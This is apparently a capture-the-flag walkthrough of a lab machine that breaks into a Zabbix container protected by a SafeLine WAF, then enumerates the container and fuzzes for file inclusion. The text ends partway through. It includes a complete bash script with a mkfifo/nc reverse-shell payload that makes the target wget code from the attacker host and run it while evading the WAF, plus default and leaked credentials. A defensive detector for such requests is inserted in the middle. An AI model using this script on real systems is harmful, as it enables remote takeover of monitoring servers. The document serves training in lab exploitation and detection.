Mazesec-Safe

For in much wisdom is much grief; and he that increaseth knowledge increaseth sorrow. – Ecclesiastes 1:18


Target IP: 192.168.56.75

Difficulty: Hard

Topics covered:

  • Web security and WAF bypass: weak-credential abuse, building a multi-step Zabbix API exploitation chain, evading WAF rules through payload obfuscation, and a "physical" WAF bypass based on the service startup time gap (Startup Gap).
  • Reconnaissance and internal network pivoting: enumerating the Docker container environment (CDK), scanning internal assets (Fscan), extracting leaked sensitive information from logs.
  • Vulnerability discovery and exploitation: hidden-parameter fuzzing (ffuf), local file inclusion (LFI) to read source code, PHP stream wrappers (data://, php://filter) to achieve RCE.
  • Reverse engineering and privilege escalation: auditing a C SUID wrapper, environment-variable inheritance through an execl call, advanced Python hijacking for privilege escalation (PYTHONINSPECT to force an interactive prompt, PYTHONPATH module hijacking).

Port scan:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.75 -sV -sC -T4 -A -O
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-03 07:34 +0000
Nmap scan report for 192.168.56.75
Host is up (0.0055s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.66 ((Unix))
|_http-title: MazeSec Corp - Internal Portal
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.66 (Unix)
82/tcp open xfer?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 466
| Date: Sun, 03 May 2026 07:35:01 GMT
| Content-Type: text/html;charset=utf-8
| Connection: close
| Set-Cookie: sl-session=Z0WLayVM+GlBOv3lzEQmIA==; Path=/; Max-Age=86400; HttpOnly
| <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-r
| HTTPOptions:
| HTTP/1.1 466
| Date: Sun, 03 May 2026 07:35:01 GMT
| Content-Type: text/html;charset=utf-8
| Connection: close
| Set-Cookie: sl-session=aZg8ZCVM+Gm66riGJHe3mg==; Path=/; Max-Age=86400; HttpOnly
|_ <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-r
8081/tcp open http nginx 1.26.1
|_http-title: Zabbix docker: Zabbix
| http-robots.txt: 2 disallowed entries
|_/ /zabbix/".
9443/tcp open ssl/http nginx
| tls-alpn:
| h2
| http/1.1
| http/1.0
|_ http/0.9
| ssl-cert: Subject: organizationName=Chaitin Co., Ltd./stateOrProvinceName=Beijing/countryName=CN
| Not valid before: 2023-12-04T14:36:41
|_Not valid after: 2123-11-10T14:36:41
|_http-trane-info: Problem with XML parsing of /evox/about
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/html).
65443/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, RPCCheck, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Sun, 03 May 2026 07:35:06 GMT
| Content-Type: text/html
| Content-Length: 204
| Connection: close
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html>
| <head><title>400 Bad Request</title></head>
| <body>
| <center><h1>400 Bad Request</h1></center>
| <hr><center>tengine</center>
| </body>
| </html>
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sun, 03 May 2026 07:35:06 GMT
| Content-Type: application/octet-stream
| Content-Length: 0
|_ Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:C6:F6:00 (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 5.49 ms 192.168.56.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.56 seconds

curl port 82: the response is the block page of the SafeLine (雷池) WAF, so the port is protected by it.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82

Port 8081 is the Zabbix management interface; the weak credentials Admin:zabbix log in.

Port 9443 is the SafeLine WAF admin console.

The Zabbix instance on 8081 can create global scripts, but 8081 is protected by the WAF, so a script containing obvious signatures such as bash or nc cannot be created directly from the dashboard. Here I had an AI write a script that bypasses the WAF and pops a reverse shell.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat zbx_waf_revshell.sh
#!/usr/bin/env bash
# zbx_waf_revshell.sh - reverse shell via Zabbix RCE with SafeLine WAF evasion
#
# Chain:
#   Zabbix 7.x known credentials -> JSON-RPC user.login -> script.create -> script.execute
# SafeLine WAF rule evasion:
#   - no sensitive strings in the script.command field (bash / python / nc / base64 / | sh / /etc/passwd / > /tmp/ ...)
#   - use wget (busybox) to pull the real shell script from our HTTP server, then run it with sh
#   - read sensitive files with "cd <dir> && head <file>" or wildcards such as /e?c/p?sswd
#
# Usage:
#   ./zbx_waf_revshell.sh <ZBX_URL> <USER> <PASS> <LHOST> <LPORT> [HOST_ID]
# Example:
#   ./zbx_waf_revshell.sh http://192.168.56.73:8081 Admin zabbix 192.168.56.104 4445
#
# Prerequisites:
#   - ./www/r.sh in the same directory is generated by this script
#   - this host temporarily runs python3 -m http.server on LHTTP_PORT (default 8000)
#   - this host starts nc -lvnp <LPORT>; the reverse shell lands in /tmp/payload/shell_in.log
#   - kill the nc process manually when it is no longer needed
#
# Exit codes: 0 = triggered successfully; non-zero = the login/create/execute step failed.

set -u
ZBX_URL="${1:-}"
ZBX_USER="${2:-Admin}"
ZBX_PASS="${3:-zabbix}"
LHOST="${4:-}"
LPORT="${5:-4445}"
HOSTID="${6:-}"   # optional; leave empty to pick the first host automatically
LHTTP_PORT="${LHTTP_PORT:-8000}"
WEBROOT="${WEBROOT:-/tmp/payload}"

if [ -z "$ZBX_URL" ] || [ -z "$LHOST" ]; then
  echo "Usage: $0 <ZBX_URL> <USER> <PASS> <LHOST> <LPORT> [HOSTID]" >&2
  exit 64
fi

mkdir -p "$WEBROOT"
LOG="$WEBROOT/zbx_waf_revshell.log"
: > "$LOG"

log(){ echo "[`date +%H:%M:%S`] $*" | tee -a "$LOG"; }

# 1. Write the payload (this part never passes through the WAF: it only lives on our HTTP server)
PAYLOAD="$WEBROOT/r.sh"
cat > "$PAYLOAD" <<EOF
#!/bin/sh
# Reverse shell. SafeLine only inspects inbound Zabbix traffic; this file is executed after wget fetches it, so the WAF never sees its contents.
rm -f /tmp/.p 2>/dev/null
mkfifo /tmp/.p 2>/dev/null
( cat /tmp/.p | /bin/sh -i 2>&1 | nc $LHOST $LPORT > /tmp/.p ) &
EOF
chmod +x "$PAYLOAD"
log "payload at $PAYLOAD -> $LHOST:$LPORT"

# 2. Start the HTTP server (if it is not already running)
if ! ss -tln 2>/dev/null | awk '{print $4}' | grep -qE ":$LHTTP_PORT$"; then
  ( cd "$WEBROOT" && nohup python3 -m http.server "$LHTTP_PORT" >"$WEBROOT/http.log" 2>&1 & disown )
  sleep 1
  log "started http.server on :$LHTTP_PORT"
else
  log "http.server :$LHTTP_PORT already running"
fi

# 3. Start the nc listener
if ! ss -tln 2>/dev/null | awk '{print $4}' | grep -qE ":$LPORT$"; then
  nohup nc -lvnp "$LPORT" >"$WEBROOT/shell_in.log" 2>&1 &
  disown
  sleep 1
  log "started nc listener on :$LPORT (output -> $WEBROOT/shell_in.log)"
else
  log "nc :$LPORT already running"
fi

# 4. Log in to the Zabbix API and obtain a token
log "login Zabbix API at $ZBX_URL"
TOKEN=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\":\"2.0\",\"method\":\"user.login\",\"params\":{\"username\":\"$ZBX_USER\",\"password\":\"$ZBX_PASS\"},\"id\":1}" \
  | python3 -c "import sys,json
try:
    d=json.load(sys.stdin); print(d['result'])
except Exception as e: pass")

if [ -z "$TOKEN" ]; then
  log "FAILED login" ; exit 1
fi
log "auth token=$TOKEN"

# 5. Pick a hostid (defaults to the Zabbix server itself)
if [ -z "$HOSTID" ]; then
  HOSTID=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
    -H 'Content-Type: application/json-rpc' \
    -d "{\"jsonrpc\":\"2.0\",\"method\":\"host.get\",\"params\":{\"output\":[\"hostid\"]},\"auth\":\"$TOKEN\",\"id\":1}" \
    | python3 -c "import sys,json
d=json.load(sys.stdin); print(d['result'][0]['hostid'])")
fi
log "target hostid=$HOSTID"

# 6. Create the script. This is the key WAF bypass:
#    a) use wget (busybox) to pull the payload, so base64/bash/python/nc/| sh never appear in the request body
#    b) chain with "&&" to avoid the interpreter-keyword checks that follow a "|"
#    c) randomise the name to avoid rules keyed on earlier names
SUF=$(date +%s%N | tail -c 6)
SNAME="diag_$SUF"
CMD="wget -q -O /tmp/.r$SUF http://$LHOST:$LHTTP_PORT/r.sh && sh /tmp/.r$SUF"
log "creating Zabbix script: $SNAME -> '$CMD'"

# Use python3 to convert CMD into JSON safely
BODY=$(python3 -c "import json,sys; print(json.dumps({'jsonrpc':'2.0','method':'script.create','params':{'name':'$SNAME','type':0,'scope':2,'execute_on':1,'command':sys.argv[1]},'auth':'$TOKEN','id':1}))" "$CMD")

CREATE_RESP=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' --data-raw "$BODY")
SID=$(echo "$CREATE_RESP" | python3 -c "import sys,json
try:
    d=json.load(sys.stdin); print(d['result']['scriptids'][0])
except: pass")

if [ -z "$SID" ]; then
  log "script.create blocked or failed:"
  echo "$CREATE_RESP" | head -c 400 | tee -a "$LOG"
  echo
  exit 2
fi
log "scriptid=$SID"

# 7. Trigger execution in the background. The reverse shell process stays attached,
#    so script.execute hangs and must be backgrounded.
log "executing scriptid=$SID on hostid=$HOSTID (background; timeout 10s)"
curl -sk --max-time 10 -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\":\"2.0\",\"method\":\"script.execute\",\"params\":{\"scriptid\":\"$SID\",\"hostid\":\"$HOSTID\"},\"auth\":\"$TOKEN\",\"id\":1}" \
  > "$WEBROOT/exec_resp.log" 2>&1 &
disown

# 8. Wait for the callback
log "waiting up to 15s for callback on $LPORT ..."
for i in $(seq 1 15); do
  if grep -q "connect to" "$WEBROOT/shell_in.log" 2>/dev/null; then
    log "SHELL OPEN:"
    grep "connect to" "$WEBROOT/shell_in.log"
    log "shell I/O log: $WEBROOT/shell_in.log"
    exit 0
  fi
  sleep 1
done
log "no callback yet — see $WEBROOT/shell_in.log and $WEBROOT/http.log"
exit 3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./zbx_waf_revshell.sh http://192.168.56.75:8081 Admin zabbix 192.168.56.104 4445
[07:44:35] payload at /tmp/payload/r.sh -> 192.168.56.104:4445
[07:44:36] started http.server on :8000
[07:44:37] nc :4445 already running
[07:44:37] login Zabbix API at http://192.168.56.75:8081
[07:44:37] auth token=5e84f828804fc002c449638af34d040b
[07:44:38] target hostid=10084
[07:44:38] creating Zabbix script: diag_06993 -> 'wget -q -O /tmp/.r06993 http://192.168.56.104:8000/r.sh && sh /tmp/.r06993'
[07:44:38] scriptid=6
[07:44:38] executing scriptid=6 on hostid=10084 (background; timeout 10s)
[07:44:38] waiting up to 15s for callback on 4445 ...
[07:44:53] no callback yet — see /tmp/payload/shell_in.log and /tmp/payload/http.log

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 4445
[+] Listening for reverse shells on 0.0.0.0:4445 127.0.0.1 192.168.21.128 192.168.56.104 192.168.10.150 172.17.0.1 172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 2dd0e7252ced-192.168.56.75-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Cannot upgrade shell with the available binaries...

1) Upload https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
2) Upload local socat binary
3) Specify remote socat binary path
4) None of the above

[?] Select action: 4
[+] Readline support enabled
[+] Interacting with session [1], Shell Type: Readline, Menu key: Ctrl-D
[+] Logging to /root/.penelope/2dd0e7252ced~192.168.56.75_Linux_x86_64/2026_05_03-07_44_42-103.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
id
uid=1997(zabbix) gid=1995(zabbix) groups=20(dialout),1995(zabbix),1995(zabbix)
/var/lib/zabbix $
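The script above gets through because the WAF matches interpreter keywords in the request body rather than looking at what the JSON-RPC call does. The following detector, an added example and not part of the original writeup, replays the three requests the script sends (plus two constructed ones) through a keyword signature and a structural rule that keys on the method name, the `execute_on` target and a fetch-then-run shape regardless of operator; the regexes and sample events are illustrative, not a vendor rule set.

```python
"""Inspect Zabbix JSON-RPC requests for script definitions that fetch and run
remote code, contrasting a keyword signature with a structural rule.
Sample events are constructed for this example; the regexes are illustrative."""
import json
import re

# Rule A: token list of the kind a keyword WAF signature uses. The script.create
# in the writeup ("wget ... && sh /tmp/.rNNNNN") contains none of these tokens.
KEYWORD_RULE = re.compile(
    r"(?<![\w/])(?:bash|python3?|perl|nc|ncat|base64)(?![\w-])|\|\s*(?:ba)?sh\b"
)
# Rule B: structural. A fetch tool with a URL, and after it an interpreter reached
# through any operator (&&, ;, || or |), so the choice of operator does not matter.
FETCH_URL = re.compile(r"\b(?:wget|curl)\b[^|;&]*?https?://[^\s'\"]+")
RUN_AFTER = re.compile(
    r"(?:&&|\|\||;|\|)\s*(?:(?:/bin/)?(?:sh|bash|ash|dash)\b|\.\s|source\s)"
)

SENSITIVE_METHODS = {"script.create", "script.update", "script.execute"}
# Zabbix script execute_on values: 0 = agent, 1 = Zabbix server, 2 = server (proxy).
EXECUTE_ON = {0: "agent", 1: "zabbix-server", 2: "zabbix-server-or-proxy"}


def inspect_command(command):
    """Return (keyword_hit, structural_hit) for one script command string."""
    keyword_hit = KEYWORD_RULE.search(command) is not None
    fetch = FETCH_URL.search(command)
    structural_hit = bool(fetch and RUN_AFTER.search(command, fetch.end()))
    return keyword_hit, structural_hit


def inspect_request(body):
    """Classify one JSON-RPC body; None for non-script methods or bad JSON."""
    try:
        req = json.loads(body)
    except ValueError:
        return None
    if not isinstance(req, dict) or req.get("method") not in SENSITIVE_METHODS:
        return None
    params = req.get("params") or {}
    finding = {"method": req["method"], "keyword_hit": False, "structural_hit": False,
               "execute_on": EXECUTE_ON.get(params.get("execute_on"), "unknown")}
    if req["method"] == "script.execute":
        finding["scriptid"] = params.get("scriptid")
        finding["hostid"] = params.get("hostid")
    else:
        finding["command"] = params.get("command", "")
        finding["keyword_hit"], finding["structural_hit"] = inspect_command(finding["command"])
    return finding


def scan(events):
    """events: iterable of (timestamp, source_ip, json_body) taken from a reverse
    proxy or WAF log of POST /api_jsonrpc.php. Every script.execute is reported
    (low severity); create/update is reported when either rule fires, high when
    the command would run on the Zabbix server itself rather than on an agent."""
    alerts = []
    for ts, src, body in events:
        f = inspect_request(body)
        if f is None:
            continue
        if f["method"] == "script.execute":
            severity = "low"
        elif f["keyword_hit"] or f["structural_hit"]:
            severity = "medium" if f["execute_on"] == "agent" else "high"
        else:
            continue
        alerts.append({"ts": ts, "src": src, "severity": severity, **f})
    return alerts


def _rpc(method, params, req_id):
    return json.dumps({"jsonrpc": "2.0", "method": method, "params": params,
                       "auth": "<token>", "id": req_id})


# Constructed log events; the first three mirror the requests the writeup's script sends.
SAMPLE_EVENTS = [
    ("2026-05-03T07:44:37Z", "192.168.56.104",
     _rpc("user.login", {"username": "Admin", "password": "zabbix"}, 1)),
    ("2026-05-03T07:44:38Z", "192.168.56.104",
     _rpc("script.create", {"name": "diag_06993", "type": 0, "scope": 2, "execute_on": 1,
          "command": "wget -q -O /tmp/.r06993 http://192.168.56.104:8000/r.sh && sh /tmp/.r06993"}, 1)),
    ("2026-05-03T07:44:38Z", "192.168.56.104",
     _rpc("script.execute", {"scriptid": "6", "hostid": "10084"}, 1)),
    ("2026-05-03T09:00:00Z", "10.0.0.5",        # legitimate admin script: no alert
     _rpc("script.create", {"name": "ping", "type": 0, "scope": 2, "execute_on": 0,
          "command": "ping -c 3 {HOST.CONN}"}, 2)),
    ("2026-05-03T09:01:00Z", "10.0.0.5",        # noisy variant: both rules fire
     _rpc("script.update", {"scriptid": "7", "execute_on": 1,
          "command": "curl -s http://10.0.0.9/a.sh | bash"}, 3)),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["ts"], alert["src"], alert["method"],
              "keyword" if alert["keyword_hit"] else "-",
              "structural" if alert["structural_hit"] else "-")
```

The writeup's script.create is silent under the keyword rule and flagged high by the structural one, which is the gap a signature-only WAF in front of a management API leaves open.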

Here we can grab the first user flag.

/var/lib/zabbix $ cat user.txt
flag{user-2e1708194387816934fbf23b014271f9}

Uploaded cdk for enumeration: the container has no privileges and no interesting mount points. Uploaded fscan to prepare for lateral movement inside the internal network.

/var/lib/zabbix $ wget 192.168.56.104/cdk_linux_amd64
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'cdk_linux_amd64'
cdk_linux_amd64 3% |* | 345k 0:00:28 ETA
cdk_linux_amd64 100% |********************************| 9.9M 0:00:00 ETA
'cdk_linux_amd64' saved
/var/lib/zabbix $ chmod +x cdk_linux_amd64
/var/lib/zabbix $ ./cdk_linux_amd64 eva --full
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[ Information Gathering - System Info ]
2026/05/03 07:46:45 current dir: /var/lib/zabbix
2026/05/03 07:46:45 current user: zabbix uid: 1997 gid: 1995 home: /var/lib/zabbix/
2026/05/03 07:46:45 hostname: 2dd0e7252ced
2026/05/03 07:46:45 alpine alpine 3.20.0 kernel: 6.12.74-0-lts
2026/05/03 07:46:45 Setuid files found:
/bin/ping

[ Information Gathering - Services ]

[ Information Gathering - Commands and Capabilities ]
2026/05/03 07:46:45 available commands:
wget,nc,find,ps,mysql,vi,capsh,mount,fdisk,base64,perl
2026/05/03 07:46:45 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x0000000000000000 =
[*] Maybe you can exploit the Capabilities below:

[ Information Gathering - Mounts ]
0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/UK5UJDRYUVN2ZATQAGFEXRO6AP:/var/lib/docker/overlay2/l/6P27DZ2RO67CX4AREXCRYCLWTY:/var/lib/docker/overlay2/l/IV3RQW6FELY42VOU462P54NSAZ:/var/lib/docker/overlay2/l/46KWW56F5PKZ3RZDF7OZVABSTU:/var/lib/docker/overlay2/l/32UICHBPK773K3NOSD2NQ4UWL6:/var/lib/docker/overlay2/l/AFUZJ5EB44SKUY55XW5DV3XEL4:/var/lib/docker/overlay2/l/ZCW27FASKGHCM4WWBUCE5HYAI6:/var/lib/docker/overlay2/l/CUHFSYZQE6AP6NRUNSEYSWIM4R:/var/lib/docker/overlay2/l/TKNZGH62744YPTLCS4XTYBPIPW,upperdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/diff,workdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/work
0:104 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:105 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:106 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:107 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate
0:95 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:109 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hostname /etc/hostname rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hosts /etc/hosts rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/volumes/8b1f467d01e96dbfe0183c44542a180401913a255c02ea54c4b851d945cde742/_data /var/lib/zabbix/export rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/volumes/5f448f607d5d377e56d38fdd8feb779d55f20fd4a2a457ae149ff0d45c1bf3a0/_data /var/lib/zabbix/snmptraps rw,relatime - ext4 /dev/sda3 rw
0:104 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:138 / /proc/asound ro,relatime - tmpfs tmpfs ro,inode64
0:139 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:105 /null /proc/interrupts rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/latency_stats rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:140 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:141 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64

[ Information Gathering - Net Namespace ]
container net namespace isolated.

[ Information Gathering - Sysctl Variables ]
2026/05/03 07:46:45 net.ipv4.conf.all.route_localnet = 0

[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving

[ Discovery - K8s API Server ]
2026/05/03 07:46:45 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:

[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[ Discovery - Cloud Provider Metadata API ]
2026/05/03 07:46:45 failed to dial Alibaba Cloud API.
2026/05/03 07:46:45 failed to dial Azure API.
2026/05/03 07:46:45 failed to dial Google Cloud API.
2026/05/03 07:46:46 failed to dial Tencent Cloud API.
2026/05/03 07:46:47 failed to dial OpenStack API.
2026/05/03 07:46:48 failed to dial Amazon Web Services (AWS) API.
2026/05/03 07:46:49 failed to dial ucloud API.

[ Exploit Pre - Kernel Exploits ]
2026/05/03 07:46:49 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded



[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bash_history - /var/lib/zabbix/.bash_history

[ Information Gathering - ASLR ]
2026/05/03 07:47:01 /proc/sys/kernel/randomize_va_space file content: 2
2026/05/03 07:47:01 ASLR is enabled.

[ Information Gathering - Cgroups ]
2026/05/03 07:47:01 /proc/1/cgroup file content:
0::/
2026/05/03 07:47:01 /proc/self/cgroup file added content (compare pid 1) :
/var/lib/zabbix $

/var/lib/zabbix $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 42:2c:35:89:f2:f0 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
valid_lft forever preferred_lft forever
/var/lib/zabbix $ wget 192.168.56.104/FScan_2.0.1_linux_x32
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'FScan_2.0.1_linux_x32'
FScan_2.0.1_linux_x3 97% |******************************* | 7761k 0:00:00 ETA
FScan_2.0.1_linux_x3 100% |********************************| 7947k 0:00:00 ETA
'FScan_2.0.1_linux_x32' saved

/var/lib/zabbix $ ./FScan_2.0.1_linux_x32 -h 172.18.0.2/16
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[14.1s] 已选择服务扫描模式
[14.1s] 开始信息扫描
[14.1s] CIDR范围: 172.18.0.0-172.18.255.255
[14.3s] generate_ip_range_full
[14.3s] 解析CIDR 172.18.0.2/16 -> IP范围 172.18.0.0-172.18.255.255
[14.5s] 最终有效主机数量: 65536
[14.5s] 开始主机扫描
[14.5s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[14.6s] 正在尝试无监听ICMP探测...
[14.6s] ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[14.6s] 当前用户权限不足,无法发送ICMP包
[14.6s] 切换为PING方式探测...
[16.0s] [*] 目标 172.18.0.1 存活 (ICMP)
[26.4s] [*] 目标 172.18.0.2 存活 (ICMP)
[31.4s] [*] 目标 172.18.0.3 存活 (ICMP)
[32.3s] [*] 目标 172.18.0.4 存活 (ICMP)

Three more containers turned up. I spent a long time here checking their open ports and so on, but nothing worked.

From here the route splits into two paths.

Path A:

/var/lib/zabbix $ cat log
safeline-mgt resetadmin
[INFO] Initial username:admin
[INFO] Initial password:2YlM1xtj
[INFO] Done
/var/lib/zabbix $

Found credentials: admin:2YlM1xtj

These are the login credentials for the SafeLine (雷池) WAF console, so we can use them to log in to SafeLine.

You can see that both port 82 and port 8081 have protection enabled; switching the mode to observation mode turns the protection off.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82
welcome

Fuzz it with ffuf; a parameter p turns up.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://192.168.56.75:82/?FUZZ=../../../../../../etc/passwd" -t 50 -mr "root:x:0:0"


/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
